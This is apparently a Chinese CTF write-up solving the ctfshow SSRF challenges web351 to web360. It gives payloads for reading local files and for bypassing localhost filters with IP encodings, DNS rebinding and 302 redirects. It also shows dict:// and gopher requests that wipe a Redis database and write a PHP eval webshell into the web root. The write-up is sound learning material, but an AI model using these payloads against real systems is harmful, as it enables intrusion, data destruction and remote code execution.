SSRF

web351

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
?>

没有开启open_basedir,可以利用file协议随便读文件了

url=file:///var/www/html/flag.php

web352,353

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|127.0.0/')){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?>

<?php
$url = 'http://username:password@hostname/path?arg=value#anchor';
print_r(parse_url($url));
echo parse_url($url, PHP_URL_PATH);
?>
/*
Array
(
    [scheme] => http
    [host] => hostname
    [user] => username
    [pass] => password
    [path] => /path
    [query] => arg=value
    [fragment] => anchor
)
/path
*/

逆天

url=http://0.0.0.0/flag.php
url=http://0/flag.php
url=http://127.1/flag.php
url=http://127.0.1.3/flag.php
url=http://127.127.127.127/flag.php
url=http://127.0000000000000.001/flag.php
url=http://017700000001/flag.php
url=http://0x7f.0.0.1/flag.php
url=http://0177.0.0.1/flag.php
url=http://localhost/flag.php
url=http://sudo.cc/flag.php
url=http://0x7F000001/flag.php
url=http://localtest.me/flag.php
url=http://2130706433/flag.php

url=http://127。0。0。1/flag.php	   //×
url=http://127。0.0.1/flag.php		//×
url=http://loc£Álhost/flag.php		//×

web354

if(!preg_match('/localhost|1|0|。/i', $url)){

可以选上面的payload也可以拿DNS重绑定打

http://ceye.io/注册绑定127.0.0.1然后记得前面加r

url=http://r.nm1rxx.ceye.io/flag.php	//逆天!我的随机地址竟然有1	qAq

302跳转

服务器放上代码

<?php header("Location:http://127.0.0.1/flag.php");

更改域名A记录

127.0.0.1
url=http://sudo.cc/flag.php

web355

要求url解析后的host部分<=5

url=http://127.1/flag.php

web356

要求url解析后的host部分<=3

url=http://0/flag.php

0在linux系统中会解析成127.0.0.1

在windows中解析成0.0.0.0

web357

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$ip = gethostbyname($x['host']);
echo '</br>'.$ip.'</br>';
if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
    die('ip!');
}


echo file_get_contents($_POST['url']);
}
else{
    die('scheme');
}
?>

FILTER_FLAG_IPV4 - 要求值是合法的 IPv4 IP（比如 255.255.255.255）

FILTER_FLAG_IPV6 - 要求值是合法的 IPv6 IP（比如 2001:0db8:85a3:08d3:1319:8a2e:0370:7334）

FILTER_FLAG_NO_PRIV_RANGE - 要求值不在 RFC 指定的私有范围 IP 内（比如 192.168.0.1）

FILTER_FLAG_NO_RES_RANGE - 要求值不在保留的 IP 范围内。该标志接受 IPV4 和 IPV6 值

302跳转

url=http://39.105.125.61/32jump.php

web358

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if(preg_match('/^http:\/\/ctf\..*show$/i',$url)){
    echo file_get_contents($url);
}

url=http://ctf.:haihaihai@0/flag.php#show

web359

提示打无密码的mysql

执行一下发现无回显,那就写入shell

py2

https://github.com/tarunkant/Gopherus

因为cURL会解码一次,生成的payload需要再编码一次

web360

打redis

手打:

探测是否需要认证

url=dict://0:6379/info

不用认证直接打命令就可以了

url=dict://0:6379/flushall

url=dict://0:6379/set:anz:"\x3c\x3f\x70\x68\x70\x20\x65\x76\x61\x6c\x28\x24\x5f\x50\x4f\x53\x54\x5b\x31\x5d\x29\x3b\x3f\x3e"

url=dict://0:6379/config:get:dir

url=dict://0:6379/config:set:dbfilename:shell.php

url=dict://0:6379/save

url=dict://0:6379/quit

半自动:

可以发现里面的代码和用dict协议打的大致相同,区别只在于gopherus协议可以一下执行多条命令,而dict协议只能一条条执行

*1
$8
flushall
*3
$3
set
$1
1
$28
<?php eval($_POST[1]);?>
*4
$6
config
$3
set
$3
dir
$13
/var/www/html
*4
$6
config
$3
set
$10
dbfilename
$9
shell.php
*1
$4
save

如果需要密码的话可以直接在payload前面加上

*2		
$4		
auth		
$4
密码